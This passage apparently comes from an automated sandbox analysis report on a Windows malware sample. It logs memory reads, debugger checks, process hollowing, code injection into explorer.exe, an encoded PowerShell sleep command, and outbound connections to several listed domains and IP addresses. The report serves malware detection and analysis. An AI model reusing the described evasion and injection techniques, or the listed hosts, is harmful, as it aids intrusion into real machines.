Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176AD30 mov eax, dword ptr fs:[00000030h] 3_2_0176AD30
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017EA537 mov eax, dword ptr fs:[00000030h] 3_2_017EA537
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0182FDE2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0182FDE2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0182FDE2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0182FDE2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01818DF1 mov eax, dword ptr fs:[00000030h] 3_2_01818DF1
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177D5E0 mov eax, dword ptr fs:[00000030h] 3_2_0177D5E0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177D5E0 mov eax, dword ptr fs:[00000030h] 3_2_0177D5E0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01838D34 mov eax, dword ptr fs:[00000030h] 3_2_01838D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h] 3_2_017E6DC9
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h] 3_2_017E6DC9
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h] 3_2_017E6DC9
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6DC9 mov ecx, dword ptr fs:[00000030h] 3_2_017E6DC9
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h] 3_2_017E6DC9
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h] 3_2_017E6DC9
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182E539 mov eax, dword ptr fs:[00000030h] 3_2_0182E539
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01791DB5 mov eax, dword ptr fs:[00000030h] 3_2_01791DB5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01791DB5 mov eax, dword ptr fs:[00000030h] 3_2_01791DB5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01791DB5 mov eax, dword ptr fs:[00000030h] 3_2_01791DB5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017935A1 mov eax, dword ptr fs:[00000030h] 3_2_017935A1
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179FD9B mov eax, dword ptr fs:[00000030h] 3_2_0179FD9B
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179FD9B mov eax, dword ptr fs:[00000030h] 3_2_0179FD9B
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01792581 mov eax, dword ptr fs:[00000030h] 3_2_01792581
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01792581 mov eax, dword ptr fs:[00000030h] 3_2_01792581
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01792581 mov eax, dword ptr fs:[00000030h] 3_2_01792581
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01792581 mov eax, dword ptr fs:[00000030h] 3_2_01792581
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h] 3_2_01762D8A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h] 3_2_01762D8A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h] 3_2_01762D8A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h] 3_2_01762D8A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h] 3_2_01762D8A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178746D mov eax, dword ptr fs:[00000030h] 3_2_0178746D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017FC450 mov eax, dword ptr fs:[00000030h] 3_2_017FC450
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017FC450 mov eax, dword ptr fs:[00000030h] 3_2_017FC450
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179A44B mov eax, dword ptr fs:[00000030h] 3_2_0179A44B
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01838CD6 mov eax, dword ptr fs:[00000030h] 3_2_01838CD6
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179BC2C mov eax, dword ptr fs:[00000030h] 3_2_0179BC2C
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6C0A mov eax, dword ptr fs:[00000030h] 3_2_017E6C0A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6C0A mov eax, dword ptr fs:[00000030h] 3_2_017E6C0A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6C0A mov eax, dword ptr fs:[00000030h] 3_2_017E6C0A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6C0A mov eax, dword ptr fs:[00000030h] 3_2_017E6C0A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_018214FB mov eax, dword ptr fs:[00000030h] 3_2_018214FB
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h] 3_2_01821C06
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h] 3_2_01821C06
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h] 3_2_01821C06
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h] 3_2_01821C06
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h] 3_2_01821C06
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h] 3_2_01821C06
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h] 3_2_01821C06
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h] 3_2_01821C06
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h] 3_2_01821C06
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h] 3_2_01821C06
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h] 3_2_01821C06
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h] 3_2_01821C06
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h] 3_2_01821C06
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h] 3_2_01821C06
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0183740D mov eax, dword ptr fs:[00000030h] 3_2_0183740D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0183740D mov eax, dword ptr fs:[00000030h] 3_2_0183740D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0183740D mov eax, dword ptr fs:[00000030h] 3_2_0183740D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6CF0 mov eax, dword ptr fs:[00000030h] 3_2_017E6CF0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6CF0 mov eax, dword ptr fs:[00000030h] 3_2_017E6CF0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E6CF0 mov eax, dword ptr fs:[00000030h] 3_2_017E6CF0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177849B mov eax, dword ptr fs:[00000030h] 3_2_0177849B
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177FF60 mov eax, dword ptr fs:[00000030h] 3_2_0177FF60
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177EF40 mov eax, dword ptr fs:[00000030h] 3_2_0177EF40
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179E730 mov eax, dword ptr fs:[00000030h] 3_2_0179E730
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01764F2E mov eax, dword ptr fs:[00000030h] 3_2_01764F2E
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01764F2E mov eax, dword ptr fs:[00000030h] 3_2_01764F2E
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178F716 mov eax, dword ptr fs:[00000030h] 3_2_0178F716
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017FFF10 mov eax, dword ptr fs:[00000030h] 3_2_017FFF10
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017FFF10 mov eax, dword ptr fs:[00000030h] 3_2_017FFF10
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179A70E mov eax, dword ptr fs:[00000030h] 3_2_0179A70E
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179A70E mov eax, dword ptr fs:[00000030h] 3_2_0179A70E
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0183070D mov eax, dword ptr fs:[00000030h] 3_2_0183070D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0183070D mov eax, dword ptr fs:[00000030h] 3_2_0183070D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A37F5 mov eax, dword ptr fs:[00000030h] 3_2_017A37F5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01778794 mov eax, dword ptr fs:[00000030h] 3_2_01778794
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01838F6A mov eax, dword ptr fs:[00000030h] 3_2_01838F6A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E7794 mov eax, dword ptr fs:[00000030h] 3_2_017E7794
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E7794 mov eax, dword ptr fs:[00000030h] 3_2_017E7794
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E7794 mov eax, dword ptr fs:[00000030h] 3_2_017E7794
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h] 3_2_0178AE73
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h] 3_2_0178AE73
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h] 3_2_0178AE73
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h] 3_2_0178AE73
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h] 3_2_0178AE73
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177766D mov eax, dword ptr fs:[00000030h] 3_2_0177766D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01830EA5 mov eax, dword ptr fs:[00000030h] 3_2_01830EA5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01830EA5 mov eax, dword ptr fs:[00000030h] 3_2_01830EA5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01830EA5 mov eax, dword ptr fs:[00000030h] 3_2_01830EA5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h] 3_2_01777E41
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h] 3_2_01777E41
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h] 3_2_01777E41
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h] 3_2_01777E41
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h] 3_2_01777E41
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h] 3_2_01777E41
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0181FEC0 mov eax, dword ptr fs:[00000030h] 3_2_0181FEC0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01838ED6 mov eax, dword ptr fs:[00000030h] 3_2_01838ED6
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176E620 mov eax, dword ptr fs:[00000030h] 3_2_0176E620
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179A61C mov eax, dword ptr fs:[00000030h] 3_2_0179A61C
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179A61C mov eax, dword ptr fs:[00000030h] 3_2_0179A61C
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176C600 mov eax, dword ptr fs:[00000030h] 3_2_0176C600
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176C600 mov eax, dword ptr fs:[00000030h] 3_2_0176C600
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176C600 mov eax, dword ptr fs:[00000030h] 3_2_0176C600
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01798E00 mov eax, dword ptr fs:[00000030h] 3_2_01798E00
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01821608 mov eax, dword ptr fs:[00000030h] 3_2_01821608
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017776E2 mov eax, dword ptr fs:[00000030h] 3_2_017776E2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017916E0 mov ecx, dword ptr fs:[00000030h] 3_2_017916E0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017936CC mov eax, dword ptr fs:[00000030h] 3_2_017936CC
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A8EC7 mov eax, dword ptr fs:[00000030h] 3_2_017A8EC7
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0181FE3F mov eax, dword ptr fs:[00000030h] 3_2_0181FE3F
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182AE44 mov eax, dword ptr fs:[00000030h] 3_2_0182AE44
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182AE44 mov eax, dword ptr fs:[00000030h] 3_2_0182AE44
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E46A7 mov eax, dword ptr fs:[00000030h] 3_2_017E46A7
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017FFE87 mov eax, dword ptr fs:[00000030h] 3_2_017FFE87
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\SC_0017384.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0040CEC3 LdrLoadDll, 3_2_0040CEC3
Source: C:\Users\user\Desktop\SC_0017384.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 54.85.86.211 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.myprojoints.com
Source: C:\Windows\explorer.exe Network Connect: 172.67.152.24 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 74.208.236.131 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.229 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.metatv.app
Source: C:\Windows\explorer.exe Domain query: www.findmyoriginstory.com
Source: C:\Windows\explorer.exe Domain query: www.brunaeleandro.com
Source: C:\Windows\explorer.exe Domain query: www.madisoncountylincoln.com
Source: C:\Windows\explorer.exe Network Connect: 172.67.194.225 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.emprendizajesocial.com
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\SC_0017384.exe Section unmapped: C:\Windows\SysWOW64\systray.exe base address: EA0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\SC_0017384.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Encrypted powershell cmdline option found
Source: C:\Users\user\Desktop\SC_0017384.exe Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: Base64 decoded start-sleep -seconds 20
Source: C:\Users\user\Desktop\SC_0017384.exe Process created: Base64 decoded start-sleep -seconds 20 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: Base64 decoded start-sleep -seconds 20 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: Base64 decoded start-sleep -seconds 20
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\SC_0017384.exe Memory written: C:\Users\user\Desktop\SC_0017384.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Memory written: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Memory written: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\SC_0017384.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\SC_0017384.exe Thread register set: target process: 3324 Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Thread register set: target process: 3324 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SC_0017384.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Process created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
Source: explorer.exe, 00000004.00000003.535831998.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.552222750.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.386659068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.386659068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.576565553.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager*r
Source: explorer.exe, 00000004.00000000.386659068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.576565553.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.386659068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.576565553.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.386129776.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.575675145.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanLoc*U
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SC_0017384.exe Queries volume information: C:\Users\user\Desktop\SC_0017384.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
